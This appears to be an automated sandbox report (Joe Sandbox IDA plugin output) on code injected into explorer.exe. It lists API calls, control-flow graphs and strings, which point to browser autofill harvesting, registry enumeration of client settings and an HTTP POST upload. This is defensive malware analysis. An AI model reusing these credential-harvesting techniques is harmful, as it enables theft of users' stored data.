                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,00000000), ref: 00123C6A
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00123C76
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00123C7D
                                                                                                                                                    • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00123C89
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00123D2F
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 00123D36
                                                                                                                                                    • wsprintfA.USER32 ref: 00123D55
                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 00123D61
                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00123D89
                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00123DB2
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00123DED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                                    • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                                    • API String ID: 2923052733-3488123210
                                                                                                                                                    • Opcode ID: f4870576fffec9589ff9759b72a6d46a64ca06829a263aa97d09b3fd29d24e87
                                                                                                                                                    • Instruction ID: 650e0a3edf095005fa48cdc5cd68059ccfdd7fec5d6ad7da7e1700c08a34b156
                                                                                                                                                    • Opcode Fuzzy Hash: f4870576fffec9589ff9759b72a6d46a64ca06829a263aa97d09b3fd29d24e87
                                                                                                                                                    • Instruction Fuzzy Hash: AB41DE30204265ABD711AB70AC85D3F7AAEEFE5344F40482CF859A3252DB39CD568B62

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 418 121333-121385 call 121000 call 12106c call 1212a3 425 1213a0-1213a3 418->425 426 121387-12139e 418->426 428 1213aa-1213ac 425->428 429 1213b0-1213b2 426->429 428->429 430 1215cb-1215da call 121011 429->430 431 1213b8-1213ef RtlZeroMemory 429->431 435 1215c3-1215ca 431->435 436 1213f5-12141a 431->436 435->430 439 121420-121456 call 1210b1 436->439 440 1215bf 436->440 443 121458 439->443 444 12145d-121478 439->444 440->435 443->444 446 1215b5 444->446 447 12147e-121483 444->447 446->440 448 121485-121496 447->448 449 12149d-1214c7 call 121000 wsprintfW 447->449 448->449 452 1214e0-121509 449->452 453 1214c9-1214cb 449->453 460 1215a5-1215b0 call 121011 452->460 461 12150f-12151b 452->461 454 1214cc-1214cf 453->454 456 1214d1-1214d6 454->456 457 1214da-1214dc 454->457 456->454 458 1214d8 456->458 457->452 458->452 460->446 461->460 464 121521-121537 call 121000 461->464 468 121539-121544 464->468 469 121546-121553 call 12102f 468->469 470 121558-12156f 468->470 469->470 474 121573-12157d 470->474 475 121571 470->475 474->468 476 12157f-121583 474->476 475->474 477 121585 call 12104c 476->477 478 12159a-1215a1 call 121011 476->478 481 12158a-121594 RtlMoveMemory 477->481 478->460 481->478
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                      • Part of subcall function 0012106C: lstrlen.KERNEL32(0062B176,00000000,00000000,00000000,00121366,75712B62,0062B176,00000000), ref: 00121074
                                                                                                                                                      • Part of subcall function 0012106C: MultiByteToWideChar.KERNEL32(00000000,00000000,0062B176,00000001,00000000,00000000), ref: 00121086
                                                                                                                                                      • Part of subcall function 001212A3: RtlZeroMemory.NTDLL(?,00000018), ref: 001212B5
                                                                                                                                                    • RtlZeroMemory.NTDLL(?,0000003C), ref: 001213C2
                                                                                                                                                    • wsprintfW.USER32 ref: 001214B5
                                                                                                                                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00121594
                                                                                                                                                    Strings
                                                                                                                                                    • Accept: */*Referer: %S, xrefs: 001214AF
                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 001214FB
                                                                                                                                                    • POST, xrefs: 00121465
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                                    • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                                    • API String ID: 3833683434-704803497
                                                                                                                                                    • Opcode ID: b4592787653088b0864cd0228b4c980c4a35b18d388b4bafd075b7c1a0d9b5c9
                                                                                                                                                    • Instruction ID: 3827ef76a0a70021cfd200c8cbc213d3fa3d63b6f9cff78b93f04500b7ea15a7
                                                                                                                                                    • Opcode Fuzzy Hash: b4592787653088b0864cd0228b4c980c4a35b18d388b4bafd075b7c1a0d9b5c9
                                                                                                                                                    • Instruction Fuzzy Hash: 45715771608351AFD710DF24EC88A2BBBE9FBA8344F00492DF959D3251DB30DE948B56

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 509 12a40e-12a424 510 12a4a2-12a4aa 509->510 511 12a426-12a42a 509->511 514 12a4ae-12a4c8 510->514 512 12a431-12a441 511->512 513 12a42c-12a42f 511->513 516 12a443 512->516 517 12a469-12a4a0 memcpy 512->517 513->510 513->512 515 12a4cc-12a4e3 ReadFile 514->515 518 12a524-12a538 call 12a2aa 515->518 519 12a4e5-12a4ee 515->519 520 12a445-12a448 516->520 521 12a44a-12a45a memcpy 516->521 517->514 523 12a45d 518->523 528 12a53e-12a553 memset 518->528 519->518 527 12a4f0-12a4ff call 12a250 519->527 520->517 520->521 521->523 526 12a45f-12a466 523->526 527->515 531 12a501-12a51f call 12a1c6 527->531 528->526 531->526
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$FileReadmemset
                                                                                                                                                    • String ID: winRead
                                                                                                                                                    • API String ID: 2051157613-2759563040
                                                                                                                                                    • Opcode ID: 87511060261172f0b8e27b826bb7098ad13debb469a4c2dddf424d3574114e11
                                                                                                                                                    • Instruction ID: 1af4a06fae9bc9f6a27d30c700767a30f265b8b5bdb7a5ba768f0aca9f936351
                                                                                                                                                    • Opcode Fuzzy Hash: 87511060261172f0b8e27b826bb7098ad13debb469a4c2dddf424d3574114e11
                                                                                                                                                    • Instruction Fuzzy Hash: E231AD72208390AFC740EE18EC9599FB7EAEFC4310F885929F88587211D7B0ED158B93

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • StrStrIW.SHLWAPI(?,?), ref: 00122E4B
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00122EE4
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00122F54
                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 00122F62
                                                                                                                                                      • Part of subcall function 001219E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A1E
                                                                                                                                                      • Part of subcall function 001219E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A3C
                                                                                                                                                      • Part of subcall function 001219E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A75
                                                                                                                                                      • Part of subcall function 001219E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A98
                                                                                                                                                      • Part of subcall function 00121BC5: lstrlenW.KERNEL32(00000000,00000000,?,00122E75,PathToExe,00000000,00000000), ref: 00121BCC
                                                                                                                                                      • Part of subcall function 00121BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 00121BF0
                                                                                                                                                      • Part of subcall function 00121BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00121C05
                                                                                                                                                      • Part of subcall function 00121BC5: lstrlenW.KERNEL32(00000000,?,00122E75,PathToExe,00000000,00000000), ref: 00121C1C
                                                                                                                                                      • Part of subcall function 00121AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00121B16
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                                                                    • String ID: PathToExe
                                                                                                                                                    • API String ID: 1799103994-1982016430
                                                                                                                                                    • Opcode ID: bbd8f9bb61ed6d26fffd5c1600ef663a07dd4c872dc71706b88fc362ed43864f
                                                                                                                                                    • Instruction ID: 23a2b4a06bfff6b50b5b8dee2f1f775da266aeaef6bbb29ff2ea034f8cd55b6a
                                                                                                                                                    • Opcode Fuzzy Hash: bbd8f9bb61ed6d26fffd5c1600ef663a07dd4c872dc71706b88fc362ed43864f
                                                                                                                                                    • Instruction Fuzzy Hash: 1F319E316042217F8B15AF21EC15C7F7AAAEFD4350B04852CF85987240EF34CD66DBA1

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 572 124a71-124acf call 121000 wsprintfW RegCreateKeyExW 575 124ad1-124add RegCloseKey 572->575 576 124ae6-124af5 call 121011 572->576 575->576 577 124adf-124ae3 575->577 577->576
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • wsprintfW.USER32 ref: 00124AA2
                                                                                                                                                    • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00124AC7
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00124AD4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                                                                                    • String ID: %s\%08x$Software
                                                                                                                                                    • API String ID: 1800864259-1658101971
                                                                                                                                                    • Opcode ID: 70454fc10c8f3c2799d4faaefddc6412a40191fdfb3f7d95f96c9818af9d1fce
                                                                                                                                                    • Instruction ID: c4a54de4fef27a231851fe6494f31dafa66bf44cc93de5a4190c7582d25852de
                                                                                                                                                    • Opcode Fuzzy Hash: 70454fc10c8f3c2799d4faaefddc6412a40191fdfb3f7d95f96c9818af9d1fce
                                                                                                                                                    • Instruction Fuzzy Hash: FA01FD71600118BFEB18DF94EC8ADBF7BBDEB44744F40016EF909A3141EBB06E949664

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • _alloca_probe.NTDLL ref: 0012431C
                                                                                                                                                    • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00124335
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00124363
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001243C8
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00122F0C), ref: 00121973
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(00176564,?,?,00122F0C), ref: 00121978
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,?), ref: 00121990
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,00176564), ref: 00121994
                                                                                                                                                      • Part of subcall function 0012418A: wsprintfW.USER32 ref: 00124212
                                                                                                                                                      • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2), ref: 00121020
                                                                                                                                                      • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001243B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 801677237-0
                                                                                                                                                    • Opcode ID: 6dace84e6cb61018376e8be66f2a79d56e4a8d59273ca3ae07ad70231bd3d535
                                                                                                                                                    • Instruction ID: 0f4a582640cef3638f2789553a797b0e8f51320cdcb1b2c2989c2e176c7d1a95
                                                                                                                                                    • Opcode Fuzzy Hash: 6dace84e6cb61018376e8be66f2a79d56e4a8d59273ca3ae07ad70231bd3d535
                                                                                                                                                    • Instruction Fuzzy Hash: 821142B1104211BFE715DB10DC45DBF77EDFB98344F00452DF489D2150EB74AD989A62

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 595 12b87b-12b88a 596 12b88d-12b8e3 memset 595->596 597 12b903 596->597 598 12b8e5-12b8f3 call 12b64b 596->598 600 12b905-12b914 call 12b609 597->600 603 12baf3-12baf9 598->603 604 12b8f9-12b901 598->604 606 12bae3 600->606 607 12b91a-12b923 call 12b828 600->607 604->600 608 12bae8-12baf1 call 1268ec 606->608 613 12bad6-12bae1 call 1268ec 607->613 614 12b929-12b941 607->614 608->603 613->608 615 12b943-12b944 614->615 616 12b946-12b94d 614->616 618 12b950-12b962 615->618 616->618 620 12b965-12b97c CreateFileW 618->620 621 12b9cb-12b9e4 call 12a2aa 620->621 622 12b97e-12b983 620->622 629 12ba41-12ba46 621->629 630 12b9e6-12b9fd call 1268ec * 2 621->630 623 12b9b6-12b9c9 call 12a250 622->623 624 12b985-12b9aa call 126614 call 12bb9f call 126620 622->624 623->620 623->621 649 12b9b2 624->649 650 12b9ac-12b9b0 624->650 635 12ba54-12ba6e call 1268ec * 2 629->635 636 12ba48-12ba52 629->636 647 12ba14-12ba3c call 12a1c6 call 174db2 630->647 648 12b9ff-12ba04 630->648 651 12ba70-12ba72 635->651 652 12ba74 635->652 636->635 647->603 648->647 653 12ba06-12ba0f 648->653 649->623 650->621 650->649 655 12ba79-12ba8a 651->655 652->655 653->596 657 12ba90-12baa2 call 1752ae 655->657 658 12ba8c 655->658 663 12baa4 657->663 664 12baa8-12bad4 657->664 658->657 663->664 664->603
                                                                                                                                                    APIs
                                                                                                                                                    • memset.NTDLL ref: 0012B8D5
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0012B96F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFilememset
                                                                                                                                                    • String ID: psow$winOpen
                                                                                                                                                    • API String ID: 2416746761-4101858489
                                                                                                                                                    • Opcode ID: 7bba879509bd61cded0f5d42994a34d73c345b5bca0afe2079ad1dbc74063911
                                                                                                                                                    • Instruction ID: 8c1adcf8aeab7823760547a63bd02f115d471d0840fbf3ad6de31dd5488ede3a
                                                                                                                                                    • Opcode Fuzzy Hash: 7bba879509bd61cded0f5d42994a34d73c345b5bca0afe2079ad1dbc74063911
                                                                                                                                                    • Instruction Fuzzy Hash: 35718F71A08712AFCB10DF28E8C171AB7E4FF58324F144A2DF96897281D774D964CB92

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 740 1219e5-1219f5 741 1219f7 740->741 742 1219fa-121a26 RegOpenKeyExW 740->742 741->742 743 121aa2-121aa7 742->743 744 121a28-121a44 RegQueryValueExW 742->744 745 121abb 743->745 746 121aa9-121ab9 call 1219e5 743->746 747 121a46-121a4c 744->747 748 121a94-121aa0 RegCloseKey 744->748 750 121abd-121ac3 745->750 746->750 747->748 751 121a4e-121a53 747->751 748->743 748->745 753 121a55-121a58 751->753 754 121a5a-121a7d call 121000 RegQueryValueExW 751->754 753->748 753->754 757 121a8b-121a92 call 121011 754->757 758 121a7f-121a81 754->758 757->748 758->748 760 121a83-121a89 758->760 760->748
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A1E
                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A3C
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00121A75
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2,PortNumber,00000000,00000000), ref: 00121A98
                                                                                                                                                      • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2), ref: 00121020
                                                                                                                                                      • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 217796345-0
                                                                                                                                                    • Opcode ID: 89e9062c211ef60e23f54e5c77156f6d0ea31f70145755a8b07f85c7ba43d204
                                                                                                                                                    • Instruction ID: d9d227c52ecb4d07231d3285e260526aa1eec56c71c36ed50d5b0f86bd4d409c
                                                                                                                                                    • Opcode Fuzzy Hash: 89e9062c211ef60e23f54e5c77156f6d0ea31f70145755a8b07f85c7ba43d204
                                                                                                                                                    • Instruction Fuzzy Hash: D121A672206391BFEB28CB21ED04F7B77E9EBE4754F040A1DF98993150E721CD948621
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00121ED5
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00121F0C
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00121F98
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00122F0C), ref: 00121973
                                                                                                                                                      • Part of subcall function 00121953: lstrlenW.KERNEL32(00176564,?,?,00122F0C), ref: 00121978
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,?), ref: 00121990
                                                                                                                                                      • Part of subcall function 00121953: lstrcatW.KERNEL32(00000000,00176564), ref: 00121994
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00121F82
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1077800024-0
                                                                                                                                                    • Opcode ID: 45e98e96471ce306cd09605c44bf2f9c9341c214a95e096c1d8696f72aa26c57
                                                                                                                                                    • Instruction ID: 286219d07aedcbb60fdae03e00abde47849787a64f80f656dd70747c87162af4
                                                                                                                                                    • Opcode Fuzzy Hash: 45e98e96471ce306cd09605c44bf2f9c9341c214a95e096c1d8696f72aa26c57
                                                                                                                                                    • Instruction Fuzzy Hash: DD218C71208351BFDB059B21EC48D2FBBEDEF98344F00892DF8A992110DB35CD699B22
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00121C46
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00123FA8), ref: 00121C56
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00121C91
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00121C76
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2517252058-0
                                                                                                                                                    • Opcode ID: 424873447e1154ba5a622d8a557bca2eb161c4a383d0d56d690168999ecdf683
                                                                                                                                                    • Instruction ID: d7a5bc3b319b45d8a6110d4335531a1baa9a7457d034a2256123e1519ae34b61
                                                                                                                                                    • Opcode Fuzzy Hash: 424873447e1154ba5a622d8a557bca2eb161c4a383d0d56d690168999ecdf683
                                                                                                                                                    • Instruction Fuzzy Hash: 6CF028312002287BC2209B25EC88E7B7B6CDB537F5F120318F809921D0DB125CA54170
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2), ref: 00121020
                                                                                                                                                      • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00122EE4
                                                                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00122F54
                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 00122F62
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1066184869-0
                                                                                                                                                    • Opcode ID: 68629b11e646a02bd44c19d923fd81ea7c0ded22dbf7210882b023d43f1395cd
                                                                                                                                                    • Instruction ID: 1ed5b3bd436f405fdde5f80228a0f6acd9ebb0f3c3d4ab9f99ace84a513a071e
                                                                                                                                                    • Opcode Fuzzy Hash: 68629b11e646a02bd44c19d923fd81ea7c0ded22dbf7210882b023d43f1395cd
                                                                                                                                                    • Instruction Fuzzy Hash: D8016D31204260BB8715AF21EC05DAFBBA9EFE4350F00442DF85992151DB358CA5EBA6
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitInitializeProcessUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4175140541-0
                                                                                                                                                    • Opcode ID: 603ec99f938d6b946d35abebdd4f06720fe5e5db68a9e22ac905263b1a98875a
                                                                                                                                                    • Instruction ID: 2c06f3277f994229a14e73fde05034cb40af0b72069a414d851d8911584c785b
                                                                                                                                                    • Opcode Fuzzy Hash: 603ec99f938d6b946d35abebdd4f06720fe5e5db68a9e22ac905263b1a98875a
                                                                                                                                                    • Instruction Fuzzy Hash: DBC04830284A128BEAC02BE0AC0E7093A74AB14B12F004010F20E8A8A2DBA184D08A22
                                                                                                                                                    APIs
                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00129FF8
                                                                                                                                                    Strings
                                                                                                                                                    • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0012A00E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000026.00000002.600244447.0000000000121000.00000040.80000000.00040000.00000000.sdmp, Offset: 00121000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_38_2_121000_explorer.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                    • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                                                                                    • API String ID: 10892065-982776804
                                                                                                                                                    • Opcode ID: 2cf234149b4a51f55ddf8ed28ff8e571675fce06f1bd9970121e3b6ae1a9ee43
                                                                                                                                                    • Instruction ID: 71d046d420302bfb775fb36e0498a4970e5e142012bf4fdac18f75f6488036b3
                                                                                                                                                    • Opcode Fuzzy Hash: 2cf234149b4a51f55ddf8ed28ff8e571675fce06f1bd9970121e3b6ae1a9ee43
                                                                                                                                                    • Instruction Fuzzy Hash: 3EF0F673608361BBE7301A54FC84F676B9CDB94B85F504419F945D3180E3706C518375
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121000: GetProcessHeap.KERNEL32(00000008,?,001211C7,?,?,00000001,00000000,?), ref: 00121003
                                                                                                                                                      • Part of subcall function 00121000: RtlAllocateHeap.NTDLL(00000000), ref: 0012100A
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00121B16
                                                                                                                                                      • Part of subcall function 00121011: GetProcessHeap.KERNEL32(00000000,00000000,?,00121A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00121AE2), ref: 00121020
                                                                                                                                                      • Part of subcall function 00121011: HeapFree.KERNEL32(00000000), ref: 00121027
